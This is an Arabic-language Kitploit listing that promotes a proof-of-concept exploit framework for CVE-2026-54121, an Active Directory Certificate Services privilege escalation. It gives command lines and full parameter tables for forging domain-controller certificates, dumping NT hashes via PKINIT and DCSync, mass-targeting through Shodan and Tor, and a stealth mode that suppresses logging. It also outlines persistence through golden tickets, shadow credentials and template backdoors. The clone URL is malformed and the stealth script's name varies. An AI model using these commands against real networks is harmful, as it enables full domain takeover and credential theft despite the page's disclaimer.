Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-54121-PoC-Exploit — 👻 CVE-2026-54121 - أفضل إطار عمل CertiGhost AD CS Multi-Exploit Framework | مجموعة أدوات متقدمة مع خوادم DC/LDAP المارقة، وإساءة استخدام الشهادات، واستخراج تجزئات PKINIT. الميزات: كشف الفحص الآمن، استغلال كامل متعدد الخيوط. 🛡️ CVSS 8.8 مخاطر عالية - استخدمه بأخلاقية، والتزم بالقانون. 🔒 | Kitploit
أدوات/GitHubGitHub/tc4dy/cve-2026-54121-poc-exploit
المصادقة والترخيصأطر اختبار الاختراقتصعيد الامتيازاتأطر الاستغلالالاستغلالالحركة الجانبيةما بعد الاستغلالتطوير الحمولات

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

حول

GitHub
tc4dy/cve-2026-54121-poc-exploit

CVE-2026-54121-PoC-Exploit

عرض المستودع
2764منذ شهر واحدتمت المراجعة من قبل Kitploit

👻 CVE-2026-54121 - أفضل إطار عمل CertiGhost AD CS Multi-Exploit Framework | مجموعة أدوات متقدمة مع خوادم DC/LDAP المارقة، وإساءة استخدام الشهادات، واستخراج تجزئات PKINIT. الميزات: كشف الفحص الآمن، استغلال كامل متعدد الخيوط. 🛡️ CVSS 8.8 مخاطر عالية - استخدمه بأخلاقية، والتزم بالقانون. 🔒

مشاركة

CVE-2026-54121

CVE-2026-54121 - AD CS "Certighost" إطار عمل وأداة رفع الامتيازات

CVE-2026-54121 CVSS 8.8 Python 3.6+

Privilege Escalation Identity Impersonation Domain Admin

خدمات الشهادات في Active Directory — Certighost → الاستيلاء على المجال

إطار عمل الاستغلال وأداة التدقيق
للاستخدام في الاختبارات الأمنية المصرح بها فقط.

--- ## ⚖️ إخلاء المسؤولية القانونية والاستخدام المسؤول **هذه الأداة مقدمة لأغراض تعليمية واختبار الاختراق المصرح به فقط.** الكاتبون والمساهمون غير مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج. يتحمل المستخدمون وحدهم مسؤولية ضمان حصولهم على إذن كتابي صريح من مالك الهدف قبل الاختبار. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني بموجب القوانين الفيدرالية وقوانين الولايات والقوانين الدولية ذات الصلة بجرائم الإنترنت. باستخدام هذا البرنامج، فإنك توافق على: - استخدامه فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها. - الامتثال لجميع القوانين المحلية وقوانين الولايات والقوانين الفيدرالية المعمول بها. - عدم استخدامه لأي أنشطة خبيثة أو تخريبية أو غير قانونية. > ⚠️ **تحذير:** ثغرات رفع الامتيازات في Active Directory تشكل خطرًا كبيرًا على البنية التحتية للمؤسسات. الاختبارات غير المصرح بها ممنوعة منعًا باتًا. --- ## [+!] نظرة عامة على الثغرة **CVE-2026-54121** (الملقبة **"Certighost"**) هي ثغرة **رفع امتيازات (EoP)** في خدمة شهادات Active Directory من Microsoft (AD CS). وهي تسمح لمستخدمي المجال منخفضي الامتياز بانتحال شخصية حسابات أجهزة وحدة تحكم المجال وتحقيق السيطرة الكاملة على مسؤول المجال عبر تزوير الشهادات. ### كيف تعمل: 1. **تجاوز التحقق من الهدف:** تنشأ الثغرة بسبب فحوصات تفويض غير سليمة (`CWE-285`) في AD CS أثناء معالجة معاملات هدف طلب الشهادة. 2. **إعادة توجيه خادم مارقة:** تقبل المرجعية المصدقة (CA) أهداف إعادة توجيه الخادم المقدمة من العميل دون التحقق مما إذا كان الهدف وحدة تحكم مجال مصرحًا بها. 3. **انتحال شخصية وحدة تحكم المجال:** تستعلم المرجعية المصدقة (CA) من الخادم الذي يتحكم فيه المهاجم وتصدر شهادة كمبيوتر صالحة موقعة بهوية وحدة تحكم مجال متميزة. 4. **الاستيلاء على المجال (DCSync):** باستخدام شهادة وحدة التحكم بالمجال المزورة، يوثق المهاجم عبر Kerberos/PKINIT للحصول على صلاحيات وحدة تحكم المجال وتنفيذ عمليات `DCSync`. ### حقائق أساسية:

تحذير! 🌬️

تمت كتابة هذا الكود بمنهجية سهلة الاستخدام وهو يعمل بكامل وظائفه، مع إعطاء الأولوية للأمان والخصوصية وتقليل التسجيل. يُنصح بإزالة تكامل Shodan ومكتبتها تمامًا، واستخدام خيط واحد بدلاً من مجموعة خيوط، وإزالة فحص المنافذ وdetect_ip، وتعطيل التسجيل والمخرجات. استخدم "stealthcert.py" لهذا الإصدار.

CVE-2026-54121 CertiGhost - مرجع المعاملات


📋 قائمة المعاملات الكاملة

معاملات استغلال Python


stealthcare.py (استغلال آمن)


معاملات الغلاف PowerShell

🚀 أمثلة الاستخدام

root@kitploit:~
git clone https://tc4dy/CVE-2026-54121-PoC-Exploit
#install requirements

أمثلة ❄️

root@kitploit:~
# Auto-discovers CA via LDAP, creates temp computer, spawns rogue servers, requests certificate with cdc redirect, extracts DC's NT hash via PKINIT, enables DCSync for domain takeover
python3 certighost.py -d playground.local -u lowpriv -p Password123 --dc-ip 192.168.1.10

# Impersonates a specific Domain Controller (DC01$). Useful when you know exactly which DC to target. Bypasses auto-discovery
python3 certighost.py -d corp.local -u user -p Passw0rd --dc-ip 10.0.0.1 --target-san DC01$

# Uses NTLM hash instead of password. Works when password is unknown but hash is obtained. ':' before hash = empty LM hash
python3 certighost.py -d domain.local -u admin --hashes :8846f7eaee8fb117ad06bdd830b7586c --dc-ip 192.168.1.10

# Bypasses LDAP CA discovery. Uses explicitly provided CA IP and name. Useful when LDAP is restricted or CA is on different subnet
python3 certighost.py -d playground.local -u lowpriv -p Password123 --dc-ip 192.168.1.10 --ca-ip 192.168.1.20 --ca "PLAYGROUND-CA"

Powershell (الاكتشاف)

root@kitploit:~
# Native LDAP query to check if AD CS is present. Returns CA name and DNS. Read-only, safe for production. No exploitation performed
.\CertiGhost.ps1 -d playground.local --dc-ip 192.168.1.10 --username lowpriv -p Password123 --detect

استغلال الواجهة الخلفية Python

root@kitploit:~
# Runs native AD CS detection then calls Python certighost.py with all parameters. Requires certighost.py in same directory. Prints NT hash and ccache file
.\CertiGhost.ps1 -d corp.local --dc-ip 10.0.0.1 --username attacker -p P@ssw0rd --exploit --target-account DC01$

حفظ JSON، وضع الاكتشاف

root@kitploit:~
#Detection only mode. Saves results in JSON format. Useful for automation, reporting, and integration with other security tools
.\CertiGhost.ps1 -d domain.local --dc-ip 192.168.1.10 --username user -p pass --detect -o results.json

🧠 الغوص التقني العميق

1. تجاوز التحقق من الهدف في AD CS (Certighost)

تنبع الثغرة من فحوصات تفويض وتحقق غير سليمة (CWE-285) داخل خدمات الشهادات في Active Directory (AD CS) أثناء عمليات تسجيل الشهادات. يمكن للمهاجم الذي يمتلك بيانات اعتماد مجال منخفضة الامتياز التلاعب بمعاملات إعادة توجيه الهدف لخداع المرجعية المصدقة (CA) للتحقق من تأكيدات الهوية ضد نقطة نهاية مارقة.

نقطة النهاية المعرضة / سياق الطلب:

root@kitploit:~
POST /certsrv/mscep/mscep.dll HTTP/1.1
Host: ca-server.domain.local
Content-Type: application/x-www-form-urlencoded

... (Certificate Request payload with manipulated target/cdc parameters)

2. نواقل الهجوم

  • التلاعب بهدف المطاردة: يعدّل المهاجم معاملات إعادة توجيه الهدف (مثل cdc / هدف المطاردة) داخل طلب الشهادة، مما يجبر المرجعية المصدقة (CA) على توجيه حركة التحقق إلى نقطة نهاية محددة.

  • إعادة توجيه خادم مارق: تبدأ المرجعية المصدقة (CA) اتصالات LDAP أو SMB بالوجهة المقدمة من العميل دون التحقق مما إذا كان الهدف وحدة تحكم مجال شرعية ومصرحًا بها.

  • تزوير هوية وحدة التحكم بالمجال وإصدار الشهادة: يستجيب الخادم المارق الذي يسيطر عليه المهاجم لاستعلامات التحقق التي تصدرها CA نيابة عن حساب وحدة تحكم المجال المستهدف. وبناءً على هذا الاستجابة، تصدر CA شهادة موقعة صالحة تحمل هوية وحدة تحكم المجال.


3. مرحلة ما بعد الاستغلال

استرجاع تذكرة منح التذاكر (TGT)

باستخدام شهادة وحدة تحكم المجال التي تم الحصول عليها، يتم إجراء مصادقة Kerberos عبر PKINIT (تشفير المفتاح العام للمصادقة الأولية) لاسترجاع تذكرة TGT عالية الامتياز.

هجوم DCSync

مع تذكرة Kerberos التي تمتلك صلاحيات وحدة تحكم المجال، يتم استخراج تجزئات كلمات المرور لجميع الحسابات في قاعدة بيانات Active Directory (مثل krbtgt، Administrator) باستخدام تقنية DCSync.

الثبات

  • إنشاء التذكرة الذهبية: يتم تزوير تذاكر TGT عند الطلب باستخدام تجزئة كلمة مرور حساب krbtgt المستخرج.
  • بيانات الاعتماد الظلية: تتم إضافة مفاتيح شهادات غير مصرح بها إلى سمة msDS-KeyCredentialLink للحسابات المستهدفة لتأمين وصول مستمر.
  • التلاعب بقالب الشهادة: يتم تعديل صلاحيات قوالب AD CS للحفاظ على تكوينات باب خلفي تسمح برفع الامتيازات في المستقبل.

الحركة الجانبية

  • الهيمنة على المجال: يتم إنشاء جلسات بصلاحيات كاملة (SYSTEM / مسؤول المجال) عبر جميع الخوادم ومحطات العمل داخل المجال.
  • التنقل عبر الغابات: يتم الانتقال إلى المجالات الموثوقة (Forest Trust) باستخدام تقنيات سجل SID أو تفويض TGT.

📚 المراجع

  • NVD - CVE-2026-54121
  • Microsoft Security Update Guide - CVE-2026-54121
  • CERT/CC نشرة الثغرات
  • MITRE ATT&CK - T1649: سرقة أو تزوير شهادات المصادقة

🔗 استغلالات أخرى

  • CVE-2026-15409/15410 - إطار عمل الاستغلال المتعدد لـ SonicWall SMA1000
  • CVE-2026-6875 - إطار عمل استغلال RCE قبل المصادقة في ServiceNow
  • CVE-2026-41091 - SolarFlare (RedSun) رفع امتيازات محلي في Microsoft Defender
  • CVE-2026-57821 - مجموعة أدوات حقن SQL في Apache Fineract
  • CVE-2026-41940 - تجاوز المصادقة في cPanel/WHM
تنزيل الأداة
السمةالقيمة
📅 الاكتشاف / التصحيحيوليو 2026 (ثلاثاء تصحيح Microsoft)
⚠️ درجة CVSS8.8 (عالي)
🏷️ الاسم الرمزيCertighost
🎯 المنتجات المتأثرةMicrosoft Active Directory Certificate Services
🔄 الإصدارات المصححةتحديث أمان يوليو 2026
🔓 المصادقةحساب مجال منخفض الامتياز
🌍 الأثراختراق كامل لمجال Active Directory
المعاملالوصفمثال
-d, --domainاسم DNS للمجال المستهدف (مطلوب)-d playground.local
-u, --usernameمستخدم مجال منخفض الامتياز (مطلوب)-u lowpriv
-p, --passwordكلمة مرور المستخدم-p Password123
-H, --hashesتجزئة NTLM [LM:]NT-H :8846f7eaee8fb117ad06bdd830b7586c
--dc-ipعنوان IP لوحدة تحكم المجال (مطلوب)--dc-ip 192.168.1.10
--ca-ipعنوان IP للمرجعية المصدقة (اختياري)--ca-ip 192.168.1.20
--caاسم CA (يتم اكتشافه تلقائيًا إذا لم يتم تعيينه)--ca "PLAYGROUND-CA"
--listenerعنوان IP للمهاجم للخوادم المارقة--listener 192.168.1.100
--target-sanحساب الكمبيوتر الذي سيتم انتحال شخصيته (مثل DC01$)--target-san DC01$
--templateقالب الشهادة (الافتراضي: Machine)--template Machine
--computer-nameاسم حساب كمبيوتر موجود (مع $)--computer-name GHOSTABCD$
--computer-passكلمة مرور الكمبيوتر الحالية--computer-pass CGabc123...
--computer-hashتجزئة NT للكمبيوتر الحالي--computer-hash 8846f7ea...
--use-ldapاستخدام LDAP (389) بدلاً من LDAPS (636)--use-ldap
--exploitتنفيذ الاستغلال--exploit
--detectالاكتشاف فقط (بدون استغلال)--detect
-t, --threadsالحد الأقصى للخيوط للفحص الجماعي-t 10
--timeoutمهلة كل طلب (بالثواني)--timeout 10
--retryعدد محاولات إعادة المحاولة عند الفشل--retry 3
--delayالتأخير الأساسي بين الطلبات--delay 1.0
--proxyعنوان URL للوكيل--proxy http://127.0.0.1:8080
--no-verifyتعطيل التحقق من SSL--no-verify
--torاستخدام وكيل Tor (socks5h://127.0.0.1:9050)--tor
-o, --outputملف الإخراج (.json, .csv, .jsonl)-o results.json
-v, --verboseإخراج مفصّل-v
-q, --quietالوضع الصامت-q
-h, --helpعرض المساعدة-h
المعاملالوصفمثال
-t, --targetعنوان IP أو اسم مضيف CA المستهدف (مطلوب)-t 192.168.1.20
-d, --domainاسم DNS للمجال المستهدف (مطلوب)-d playground.local
--dc-ipعنوان IP لوحدة تحكم المجال (مطلوب)--dc-ip 192.168.1.10
-u, --usernameمستخدم مجال منخفض الامتياز (مطلوب)-u lowpriv
-p, --passwordكلمة مرور المستخدم-p Password123
-H, --hashesتجزئة NTLM [LM:]NT-H :8846f7eaee8fb117ad06bdd830b7586c
--computer-nameاسم حساب كمبيوتر موجود (مع $)--computer-name GHOSTABCD$
--computer-passكلمة مرور الكمبيوتر الحالية--computer-pass CGabc123...
--computer-hashتجزئة NT للكمبيوتر الحالي--computer-hash 8846f7ea...
--target-accountالحساب الذي سيتم انتحال شخصيته (مثل DC01$)--target-account DC01$
--templateقالب الشهادة (الافتراضي: Machine)--template Machine
--listenerعنوان IP للمهاجم للخوادم المارقة (اكتشاف تلقائي إذا لم يتم تعيينه)--listener 192.168.1.100
--use-ldapاستخدام LDAP (389) بدلاً من LDAPS (636)--use-ldap
--keep-filesالاحتفاظ بملفات .pfx و .ccache (الافتراضي: حذف)--keep-files
-h, --helpعرض المساعدة-h
المعاملالوصفمثال
-u, --urlعنوان IP أو اسم مضيف CA المستهدف-u 192.168.1.20
-l, --listملف يحتوي على الأهداف (هدف واحد في كل سطر)-l targets.txt
--shodanتحميل الأهداف من Shodan--shodan
--shodan-queryاستعلام بحث Shodan--shodan-query "AD CS Certificate"
-d, --domainاسم DNS للمجال المستهدف (مطلوب)-d playground.local
--dc-ipعنوان IP لوحدة تحكم المجال (مطلوب)--dc-ip 192.168.1.10
--usernameمستخدم مجال منخفض الامتياز (مطلوب)--username lowpriv
-p, --passwordكلمة مرور المستخدم-p Password123
-H, --hashesتجزئة NTLM [LM:]NT-H :8846f7ea...
--computer-nameاسم حساب كمبيوتر موجود (مع $)--computer-name GHOSTABCD$
--computer-passكلمة مرور الكمبيوتر الحالية--computer-pass CGabc123...
--computer-hashتجزئة NT للكمبيوتر الحالي--computer-hash 8846f7ea...
--target-accountالحساب الذي سيتم انتحال شخصيته (مثل DC01$)--target-account DC01$
--templateقالب الشهادة (الافتراضي: Machine)--template Machine
--listenerعنوان IP للمهاجم للخوادم المارقة--listener 192.168.1.100
--use-ldapاستخدام LDAP (389) بدلاً من LDAPS (636)--use-ldap
--exploitتنفيذ الاستغلال--exploit
--detectالاكتشاف فقط (بدون استغلال)--detect
-t, --threadsالحد الأقصى للخيوط للفحص الجماعي-t 10
--timeoutمهلة كل طلب (بالثواني)--timeout 10
--retryعدد محاولات إعادة المحاولة عند الفشل--retry 3
--delayالتأخير الأساسي بين الطلبات--delay 1.0
--proxyعنوان URL للوكيل--proxy http://127.0.0.1:8080
--no-verifyتعطيل التحقق من SSL--no-verify
--torاستخدام وكيل Tor--tor
-o, --outputملف الإخراج (.json, .csv, .jsonl)-o results.json
-v, --verboseإخراج مفصّل-v
-q, --quietالوضع الصامت-q
-h, --helpعرض المساعدة-h